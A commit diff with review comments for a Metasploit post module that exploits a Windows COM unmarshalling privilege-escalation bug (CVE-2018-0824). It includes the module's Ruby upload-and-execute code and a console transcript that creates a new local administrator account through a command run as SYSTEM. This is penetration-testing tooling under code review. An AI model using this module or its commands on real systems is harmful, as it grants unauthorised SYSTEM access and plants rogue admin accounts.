Fix exploit relics and documentation

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-10-23 17:15:34 -05:00
parent 927a29530b
commit 569c2e03c9
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
2 changed files with 102 additions and 70 deletions


@ -1,5 +1,7 @@
## Overview
This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects.
This is a post exploitation module for local privilege escalation bug
which exists in Microsoft COM for windows when it fails to properly
handle serialized objects.
* https://www.phpmyadmin.net/downloads/
* https://github.com/codewhitesec/UnmarshalPwn/
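Review bot: the first reference link, https://www.phpmyadmin.net/downloads/, has nothing to do with this module (a COM unmarshal privilege escalation) and looks like a copy-paste relic; replace it with the vendor advisory for the bug or drop it. While the paragraph is being rewrapped, "for local privilege escalation bug ... Microsoft COM for windows" should read "for a local privilege escalation bug ... Microsoft COM for Windows".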
@ -7,7 +9,7 @@ This is a post exploitation module for local privilege escalation bug which exis
## Module Options
"POCCMD" This command will be executed on successful exploitation.</br>
"COMMAND" This command will be executed on successful escalation.</br>
"SESSION" The session to run this module on.
## Limitations
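Review bot: each option line still ends with `</br>`, which is not a valid tag (use `<br>` or separate lines), and the list is now out of step with the `show options` output further down, which exposes EXPLOIT_NAME, PATH and SCRIPT_NAME in addition to COMMAND and SESSION. Document all five options here, with the same wording as the module's option descriptions.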
@ -19,7 +21,7 @@ If the system is not vulnerable, then payload will execute but new process will
If you want to confirm the vulnerability before you add user or perform any other sensitive action.
1. `set POCCMD /s notepad.exe`
1. `set COMMAND /s notepad.exe`
2. `run`
Confirmation:
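Review bot: the example `set COMMAND /s notepad.exe` only makes sense if cmd.exe is what receives the value; the code change below replaces `'cmd.exe /c ' + cmd_to_run` with the bare command, so confirm the `.sct` template itself invokes cmd.exe, otherwise this example no longer launches notepad. The lead-in sentence "If you want to confirm the vulnerability before you add user or perform any other sensitive action." is a fragment; complete it (for example "..., run a harmless command first:") and change "add user" to "add a user".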
@ -30,82 +32,117 @@ If you see notepad.exe running as SYSYEM then that is as indication of vulnerabl
## Usage
```
meterpreter > getuid
Server username: PC2\test
meterpreter > sysinfo
Computer : PC2
OS : Windows 10 (Build 17134).
meterpreter > sysinfo
Computer : WIN10X64-1703
OS : Windows 10 (Build 15063).
Architecture : x64
System Language : en_US
Domain : PSS
Logged On Users : 12
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 2...
meterpreter > execute -f cmd.exe -i -H
Process 4868 created.
Channel 7 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
msf > use post/windows/escalate/unmarshal
msf post(windows/escalate/unmarshal) > show options
C:\Users\msfuser\Downloads>net user
net user
Module options (post/windows/escalate/unmarshal):
User accounts for \\WIN10X64-1703
Name Current Setting
---- ---------------
POCCMD /k net user msfuser msfpass /add && net localgroup administrators msf /add
READFILE c:\boot.ini
SESSION
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/escalate/unmarshal_cmd_exec) > show options
msf post(windows/escalate/unmarshal) > set session 2
Module options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
msf post(windows/escalate/unmarshal) > run
msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt'
command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true
verbose => true
msf5 post(windows/escalate/unmarshal_cmd_exec) > run
[!] SESSION may not be compatible with this module.
[*] exe name is: oQT0yWT834.exe
[*] poc name is: sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/UnmarshalPwn.exe
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_header
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_footer
[*] Starting module...
[*] Location of UnmarshalPwn.exe is: C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Location of poc.sct is: C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Executing command : C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
Query for IStorage
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] exploit path is: C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] script path is: C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] command is: net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Uploading Script to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Creating the sct file with command net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] script_template_data.length = 306
[*] Writing 376 bytes to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct to target
[*] Script uploaded successfully
[*] Uploading Exploit to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Exploit uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Launching Exploit...
[*] Query for IStorage
Call: Stat
End: Stat
Query for IMarshal
Call: GetMarshalSizeMax
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000020CA320CDB0
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000017F6C3E05B0
Query for IMarshal
Call: GetUnmarshalClass
Call: GetMarshalSizeMax
Call: MarshalInterface
[+] Exploit Completed
[*] C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Post module execution completed
msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -i -H
Process 1780 created.
Channel 11 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
Confirmation
Back in Meterpreter Session
meterpreter > shell
Process 3936 created.
Channel 185 created.
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\temp\un>net user
C:\Users\msfuser\Downloads>net user
net user
User accounts for \\PC2
User accounts for \\WIN10X64-1703
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
User msfuser sshd
sshd_server test WDAGUtilityAccount
The command completed successfully.
Administrator DefaultAccount egypt
Guest msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
egypt
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>
```
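Review bot: the captured run still shows `[!] SESSION may not be compatible with this module.`, which means the module's session-type/platform metadata does not match a Windows meterpreter session; fix that in the module rather than shipping it as normal output. The transcript also mixes the old `post/windows/escalate/unmarshal` prompt and host PC2 with the new `unmarshal_cmd_exec` prompt and host WIN10X64-1703; keep one complete run from `show options` through the final `net localgroup administrators` check. The heading context line above still reads "SYSYEM" and "as indication" (should be "SYSTEM" and "an indication").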


@ -5,13 +5,11 @@
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
# include Msf::Post::Windows::Priv
def initialize(info = {})
super(update_info(info,
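Review bot: `include Msf::Post::Windows::Priv` is commented out but `require 'msf/core/post/windows/priv'` stays, and `require 'msf/core/exploit/exe'` has no matching include at all. Either delete the dead require lines together with the commented include, or keep the Priv mixin if `is_system?` is wanted for a pre-check that escalation is actually needed; commented-out code should not be left in the module.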
@ -58,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Local
def setup
super
validate_active_host
@cmd_to_run = datastore['COMMAND']
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
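Review bot: removing `@cmd_to_run = datastore['COMMAND']` from `setup` leaves the `attr_reader :cmd_to_run` kept in the last hunk returning nil. `run` now builds a local `cmd_to_run`, so any other method that still reads the command through the reader (the script-building hunk below does `full_command = cmd_to_run`) must receive it as a parameter, otherwise the template would be substituted with an empty command. Drop the reader or pass the value explicitly.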
@ -73,16 +70,14 @@ class MetasploitModule < Msf::Exploit::Local
password = Rex::Text.rand_text_alpha((rand(8) + 6))
print_status("username = #{username}, password = #{password}")
cmd_to_run = 'net user /add ' + username + ' ' + password
cmd_to_run += ' > C:\\\\Windows\\\\Temp\\\\testoutput.txt'
cmd_to_run += ' & net localgroup administrators /add ' + username
cmd_to_run += ' >> C:\\\\Windows\\\\Temp\\\\testoutput.txt'
print_status(cmd_to_run)
return cmd_to_run
end
def validate_active_host
begin
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
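Review bot: `raise Msf::Exploit::Failed` in `validate_active_host` is inconsistent with the rest of the module, which already uses `fail_with(Failure::BadConfig, ...)` in the hunk below; now that the class is `Msf::Post`, use `fail_with(Failure::Unreachable, 'Could not connect to session')` here as well. Removing the `testoutput.txt` redirects is correct (debug relic), and the generated username/password are still printed once so the operator can record them.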
@ -129,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
script_template_data = ::IO.read(local_script_template_path)
vprint_status("script_template_data.length = #{script_template_data.length}")
full_command = 'cmd.exe /c ' + cmd_to_run
full_command = cmd_to_run
full_command = full_command
script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
if script_data == nil
fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
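Review bot: `full_command = full_command` is a no-op self-assignment left over from the edit and should be deleted. Dropping the `cmd.exe /c ` prefix changes what the script receives: the COMMAND description promises "a cmd.exe builtin or Windows binary" and the examples chain with `&`, both of which only work if cmd.exe is still the interpreter, so either the `.sct` template must invoke cmd.exe itself or the description and examples need updating. The nil check on `sub!` is fine, but prefer the non-mutating `sub` so `script_template_data` is not silently altered before the length is logged.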
@ -139,9 +134,11 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('Script uploaded successfully')
end
def exploit
if cmd_to_run.nil?
def run
if datastore['COMMAND'].nil?
cmd_to_run = populate_command
else
cmd_to_run = datastore['COMMAND']
end
print_status("exploit path is: #{exploit_path}")
print_status("script path is: #{script_path}")
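Review bot: `datastore['COMMAND'].nil?` misses the empty-string case (a cleared option or `set COMMAND ''`); use `datastore['COMMAND'].blank?` so `populate_command` still generates a command instead of substituting nothing into the template. Renaming `exploit` to `run` matches the `Msf::Post` base class; the two `print_status` lines for the exploit and script paths are verbose detail and belong under `vprint_status` like the rest of the upload output.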
@ -159,20 +156,18 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('Launching Exploit...')
command_output = cmd_exec(exploit_path + ' ' + script_path)
vprint_status(command_output)
print_good('Exploit completed, wait for elevated session')
print_good('Exploit Completed')
ensure_clean_destination(exploit_path)
# ensure_clean_destination(script_path)
ensure_clean_destination(script_path)
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_good('Command failed, cleaning up')
print_error(e.message)
ensure_clean_destination(exploit_path)
# ensure_clean_destination(script_path)
ensure_clean_destination(script_path)
end
end
attr_reader :exploit_name
attr_reader :cmd_to_run
attr_reader :script_name
attr_reader :temp_path
attr_reader :exploit_path
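Review bot: cleanup is duplicated in the success path and in the `rescue`, and the rescue path announces "Command failed, cleaning up" with `print_good` rather than `print_error`. Move both `ensure_clean_destination` calls into an `ensure` block so the uploaded exploit and `.sct` are removed on every exit path, and guard the cleanup itself, since `ensure_clean_destination` can raise the same `RequestError` if the session has died. `attr_reader :cmd_to_run` is now stale (nothing assigns `@cmd_to_run` after the change to `setup`) and should be removed.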